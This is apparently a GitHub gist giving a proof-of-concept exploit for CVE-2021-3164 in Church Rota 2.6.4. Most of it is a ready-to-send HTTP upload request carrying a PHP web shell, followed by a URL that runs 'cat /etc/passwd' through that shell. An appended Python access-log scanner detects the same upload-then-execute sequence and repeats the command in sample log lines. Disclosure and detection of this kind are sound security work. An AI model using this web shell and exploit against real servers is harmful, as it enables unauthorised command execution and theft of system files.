@pikpikcu
Created March 3, 2021 10:07
POC cve-2021-3164 Church Rota version 2.6.4

Church Rota version 2.6.4 is vulnerable to authenticated remote code execution: the resource upload handler (resources.php?action=newsent) accepts an arbitrary file and stores it under the web-accessible documents/ directory, where a PHP file is then executed by the web server. The user does not need to have file upload permission in order to upload and execute an arbitrary file.

POST /resources.php?action=newsent HTTP/1.1
Host: 192.168.43.187
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36504512417128952451539028145
Content-Length: 526
DNT: 1
Connection: close
Referer: http://192.168.43.187/resources.php?action=new
Upgrade-Insecure-Requests: 1

-----------------------------36504512417128952451539028145
Content-Disposition: form-data; name="resourcename"

test
-----------------------------36504512417128952451539028145
Content-Disposition: form-data; name="resourcefile"; filename="ex.php"
Content-Type: text/plain

<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
-----------------------------36504512417128952451539028145
Content-Disposition: form-data; name="resourcedescription"

<p>pocccc</p>
-----------------------------36504512417128952451539028145--
http://192.168.43.187/documents/ex.php?cmd=cat%20/etc/passwd
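As an added example (not part of the gist), a small Python scanner that flags the upload-then-execute sequence above in web server access logs: a POST to the resource upload endpoint followed, from the same client, by a request for a script under /documents/. The endpoint and file location come from the PoC; the Apache "combined" log format, the extension list and the sample log lines are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" access-log line; the sample lines below are constructed, not real traffic.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+')
UPLOAD_PATH, UPLOAD_ACTION = "/resources.php", "newsent"  # endpoint used by the PoC
DOC_DIR = "/documents/"                                   # where the uploaded file landed
SCRIPT_EXT = (".php", ".phtml", ".phar")                  # assumed: extensions the web server executes

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"], rec["query"] = url.path, parse_qs(url.query)
    return rec

def classify(rec):
    """Label one request: the resource-upload POST, a script fetched from /documents/, or None."""
    if (rec["method"] == "POST" and rec["path"] == UPLOAD_PATH
            and rec["query"].get("action") == [UPLOAD_ACTION]):
        return "resource-upload"
    if rec["path"].startswith(DOC_DIR) and rec["path"].lower().endswith(SCRIPT_EXT):
        return "script-under-documents"
    return None

def scan(lines):
    """Return {client ip: sorted labels}; a client carrying both labels reproduced the PoC sequence."""
    by_ip = {}
    for line in lines:
        rec = parse_line(line)
        label = classify(rec) if rec else None
        if label:
            by_ip.setdefault(rec["ip"], set()).add(label)
    return {ip: sorted(v) for ip, v in by_ip.items()}

def upload_then_execute(lines):
    """Clients that uploaded a resource and then fetched a script from /documents/."""
    return sorted(ip for ip, v in scan(lines).items() if len(v) == 2)

# Constructed sample: one ordinary user (10.0.0.5) and one client following the PoC (10.0.0.9).
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Mar/2021:10:07:09 +0000] "POST /resources.php?action=newsent HTTP/1.1" 302 0',
    '10.0.0.5 - - [03/Mar/2021:10:07:20 +0000] "GET /documents/rota.pdf HTTP/1.1" 200 88000',
    '10.0.0.9 - - [03/Mar/2021:10:08:00 +0000] "POST /resources.php?action=newsent HTTP/1.1" 302 0',
    '10.0.0.9 - - [03/Mar/2021:10:08:04 +0000] "GET /documents/ex.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 60',
]
```

A script request under /documents/ is worth an alert on its own even without the preceding upload, since legitimate resources there are documents, not code.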